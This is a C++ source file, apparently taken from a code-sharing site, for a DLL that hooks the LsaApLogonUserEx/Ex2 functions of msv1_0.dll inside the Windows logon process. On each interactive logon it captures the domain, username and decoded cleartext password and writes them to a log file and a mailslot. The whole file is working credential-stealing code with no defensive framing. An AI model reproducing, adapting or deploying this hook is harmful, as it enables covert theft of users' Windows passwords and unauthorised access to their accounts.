📄 logonlogdll.cpp
字号:
#define WIN32_LEAN_AND_MEAN
#define UNICODE
#ifdef UNICODE
#define _UNICODE
#endif
#include <windows.h>
#include <tchar.h>
#define AH_STATIC_LINKING
#include <ApiHooks.h>
#define SECURITY_WIN32
#include <SSpi.h>
#include <NtSecApi.h>
#include <NtSecPkg.h>
#include "LogonLog.h"
/////////////////////////////////////////////////////////
//because LSA_AP_LOGON_USER_EX2 is not prototyped as NTAPI (but as C) in NtSecPkg.h :
typedef NTSTATUS
(NTAPI xLSA_AP_LOGON_USER_EX2) (
IN PLSA_CLIENT_REQUEST ClientRequest,
IN SECURITY_LOGON_TYPE LogonType,
IN PVOID AuthenticationInformation,
IN PVOID ClientAuthenticationBase,
IN ULONG AuthenticationInformationLength,
OUT PVOID *ProfileBuffer,
OUT PULONG ProfileBufferLength,
OUT PLUID LogonId,
OUT PNTSTATUS SubStatus,
OUT PLSA_TOKEN_INFORMATION_TYPE TokenInformationType,
OUT PVOID *TokenInformation,
OUT PUNICODE_STRING *AccountName,
OUT PUNICODE_STRING *AuthenticatingAuthority,
OUT PUNICODE_STRING *MachineName,
OUT PSECPKG_PRIMARY_CRED PrimaryCredentials,
OUT PSECPKG_SUPPLEMENTAL_CRED_ARRAY * CachedCredentials
);
xLSA_AP_LOGON_USER_EX2 *OldLsaApLogonUserEx2 = NULL;
LSA_AP_LOGON_USER_EX *OldLsaApLogonUserEx = NULL;
#define NUNHOOKS 2 //2 is enough for OVERWRITE/RAW
ADDR_CONTENTS ULA2[NUNHOOKS];
ADDR_CONTENTS ULAX[NUNHOOKS];
API_UNHOOK UnhookLsaApLogonUserEx2 = {NUNHOOKS, 0, ULA2};
API_UNHOOK UnhookLsaApLogonUserEx = {NUNHOOKS, 0, ULAX};
HANDLE hLogFile = INVALID_HANDLE_VALUE, hMS = INVALID_HANDLE_VALUE;
typedef VOID (NTAPI *TRtlRunDecodeUnicodeString)(BYTE, PUNICODE_STRING);
TRtlRunDecodeUnicodeString pRtlRunDecodeUnicodeString = NULL;
VOID WINAPI WriteLogonInfo(
IN NTSTATUS Result,
IN SECURITY_LOGON_TYPE LogonType,
IN PVOID AuthenticationInformation,
IN PVOID ClientAuthenticationBase,
IN ULONG AuthenticationInformationLength,
OUT PVOID *ProfileBuffer,
OUT PULONG ProfileBufferLength,
OUT PLUID LogonId,
OUT PNTSTATUS SubStatus,
OUT PLSA_TOKEN_INFORMATION_TYPE TokenInformationType,
OUT PVOID *TokenInformation,
OUT PUNICODE_STRING *AccountName,
OUT PUNICODE_STRING *AuthenticatingAuthority,
OUT PUNICODE_STRING *MachineName,
OUT PSECPKG_PRIMARY_CRED PrimaryCredentials,
OUT PSECPKG_SUPPLEMENTAL_CRED_ARRAY * CachedCredentials
) {
TCHAR Msg[MS_MAX_MSG_SIZE/sizeof(TCHAR)];
PTSTR Info = Msg;
PMSV1_0_INTERACTIVE_LOGON pmil = (PMSV1_0_INTERACTIVE_LOGON)AuthenticationInformation;
if(LogonType != Interactive)
Info += _stprintf(Info, _T("*Noninteractive logon*"));
else {
if(pmil->MessageType != MsV1_0InteractiveLogon)
Info += _stprintf(Info, _T("*NonMsV1_0InteractiveLogon*"));
else {
Info += _stprintf(Info, _T("*MsV1_0InteractiveLogon*"));
PWSTR buf = L"";
if(pmil->LogonDomainName.Buffer)
buf = (PWSTR)((DWORD)pmil->LogonDomainName.Buffer - ((DWORD)ClientAuthenticationBase - (DWORD)AuthenticationInformation));
Info += _stprintf(Info, _T("\r\nLogonDomainName: '%.*ws'"), pmil->LogonDomainName.Length/sizeof(WCHAR), buf);
buf = L"";
if(pmil->UserName.Buffer)
buf = (PWSTR)((DWORD)pmil->UserName.Buffer - ((DWORD)ClientAuthenticationBase - (DWORD)AuthenticationInformation));
Info += _stprintf(Info, _T("\r\nUserName: '%.*ws'"), pmil->UserName.Length/sizeof(WCHAR), buf);
buf = L"";
if(pmil->Password.Buffer) {
buf = pmil->Password.Buffer = (PWSTR)((DWORD)pmil->Password.Buffer - ((DWORD)ClientAuthenticationBase - (DWORD)AuthenticationInformation));
BYTE XorByte = HIBYTE(pmil->Password.Length);
pmil->Password.Length &= 0xFF;
if(XorByte && pRtlRunDecodeUnicodeString)
pRtlRunDecodeUnicodeString(XorByte, &pmil->Password);
}
Info += _stprintf(Info, _T("\r\nPassword: '%.*ws'"), pmil->Password.Length/sizeof(WCHAR), buf);
}
}
if((Result >= 0) && LogonId)
Info += _stprintf(Info, _T("\r\nLogonId: 0x%08X%08X"), (*LogonId).HighPart, (*LogonId).LowPart);
_stprintf(Info, _T("\r\nStatus: 0x%08X\r\n\r\n"), Result);
DWORD i, MsgSize = _tcslen(Msg)*sizeof(TCHAR);
if(hLogFile != INVALID_HANDLE_VALUE)
WriteFile(hLogFile, Msg, MsgSize, &i, NULL);
if(hMS != INVALID_HANDLE_VALUE)
WriteFile(hMS, Msg, MsgSize+sizeof(TCHAR), &i, NULL);
LocalFree(AuthenticationInformation);
}
LONG ThreadsIn = 0;
NTSTATUS NTAPI NewLsaApLogonUserEx2(
IN PLSA_CLIENT_REQUEST ClientRequest,
IN SECURITY_LOGON_TYPE LogonType,
IN PVOID AuthenticationInformation,
IN PVOID ClientAuthenticationBase,
IN ULONG AuthenticationInformationLength,
OUT PVOID *ProfileBuffer,
OUT PULONG ProfileBufferLength,
OUT PLUID LogonId,
OUT PNTSTATUS SubStatus,
OUT PLSA_TOKEN_INFORMATION_TYPE TokenInformationType,
OUT PVOID *TokenInformation,
OUT PUNICODE_STRING *AccountName,
OUT PUNICODE_STRING *AuthenticatingAuthority,
OUT PUNICODE_STRING *MachineName,
OUT PSECPKG_PRIMARY_CRED PrimaryCredentials,
OUT PSECPKG_SUPPLEMENTAL_CRED_ARRAY * CachedCredentials
) {
InterlockedIncrement(&ThreadsIn);
PVOID AuthInfo = LocalAlloc(LPTR, AuthenticationInformationLength);
if(AuthInfo)
memcpy(AuthInfo, AuthenticationInformation, AuthenticationInformationLength);
NTSTATUS Result = OldLsaApLogonUserEx2(
ClientRequest,
LogonType,
AuthenticationInformation,
ClientAuthenticationBase,
AuthenticationInformationLength,
ProfileBuffer,
ProfileBufferLength,
LogonId,
SubStatus,
TokenInformationType,
TokenInformation,
AccountName,
AuthenticatingAuthority,
MachineName,
PrimaryCredentials,
CachedCredentials);
if(AuthInfo) {
WriteLogonInfo(
Result,
LogonType,
AuthInfo,
ClientAuthenticationBase,
AuthenticationInformationLength,
ProfileBuffer,
ProfileBufferLength,
LogonId,
SubStatus,
TokenInformationType,
TokenInformation,
AccountName,
AuthenticatingAuthority,
MachineName,
PrimaryCredentials,
CachedCredentials
);
}
InterlockedDecrement(&ThreadsIn);
return(Result);
}
NTSTATUS NTAPI NewLsaApLogonUserEx(
IN PLSA_CLIENT_REQUEST ClientRequest,
IN SECURITY_LOGON_TYPE LogonType,
IN PVOID AuthenticationInformation,
IN PVOID ClientAuthenticationBase,
IN ULONG AuthenticationInformationLength,
OUT PVOID *ProfileBuffer,
OUT PULONG ProfileBufferLength,
OUT PLUID LogonId,
OUT PNTSTATUS SubStatus,
OUT PLSA_TOKEN_INFORMATION_TYPE TokenInformationType,
OUT PVOID *TokenInformation,
OUT PUNICODE_STRING *AccountName,
OUT PUNICODE_STRING *AuthenticatingAuthority,
OUT PUNICODE_STRING *MachineName
) {
InterlockedIncrement(&ThreadsIn);
PVOID AuthInfo = LocalAlloc(LPTR, AuthenticationInformationLength);
if(AuthInfo)
memcpy(AuthInfo, AuthenticationInformation, AuthenticationInformationLength);
NTSTATUS Result = OldLsaApLogonUserEx(
ClientRequest,
LogonType,
AuthenticationInformation,
ClientAuthenticationBase,
AuthenticationInformationLength,
ProfileBuffer,
ProfileBufferLength,
LogonId,
SubStatus,
TokenInformationType,
TokenInformation,
AccountName,
AuthenticatingAuthority,
MachineName
);
if(AuthInfo) {
WriteLogonInfo(
Result,
LogonType,
AuthInfo,
ClientAuthenticationBase,
AuthenticationInformationLength,
ProfileBuffer,
ProfileBufferLength,
LogonId,
SubStatus,
TokenInformationType,
TokenInformation,
AccountName,
AuthenticatingAuthority,
MachineName,
NULL,
NULL
);
}
InterlockedDecrement(&ThreadsIn);
return(Result);
}
#define NHOOKS 3
__EXPORT API_HOOK ApiHookChain[NHOOKS] = {
// only one of the following 2 APIs exists in msv1_0 - only one will be hooked
{"msv1_0.dll", LSA_AP_NAME_LOGON_USER_EX2, HOOK_OVERWRITE, &OldLsaApLogonUserEx2, &UnhookLsaApLogonUserEx2, NewLsaApLogonUserEx2},
{"msv1_0.dll", LSA_AP_NAME_LOGON_USER_EX , HOOK_OVERWRITE, &OldLsaApLogonUserEx , &UnhookLsaApLogonUserEx , NewLsaApLogonUserEx },
{HOOKS_END}
};
HMODULE hDLL;
BOOL APIENTRY DllMain(HINSTANCE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
if(ul_reason_for_call == DLL_PROCESS_ATTACH) {
GetDefaultRCInfo(); //init static AH ASAP!
hDLL = hModule;
HINSTANCE hntdll;
if(hntdll = GetModuleHandle(_T("ntdll.dll")))
pRtlRunDecodeUnicodeString = (TRtlRunDecodeUnicodeString)GetProcAddress(hntdll, "RtlRunDecodeUnicodeString");
}
return(TRUE);
}
__EXPORT DWORD StartLog(HANDLE _hLogFile, HANDLE _hMS) {
hLogFile = _hLogFile;
hMS = _hMS;
return(0);
}
__EXPORT VOID StopLog(LPVOID ThreadBody) {
while(!UnhookApis(ApiHookChain, WHOLE_AH_CHAIN))
Sleep(127);
while(ThreadsIn)
Sleep(127);
if(OldLsaApLogonUserEx2)
LocalFree(OldLsaApLogonUserEx2);
if(OldLsaApLogonUserEx)
LocalFree(OldLsaApLogonUserEx);
CloseHandle(hLogFile);
CloseHandle(hMS);
VirtualFree(ThreadBody, NULL, MEM_RELEASE);
FreeLibraryAndExitThread(hDLL, ErrorAHTimeOut);
}⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -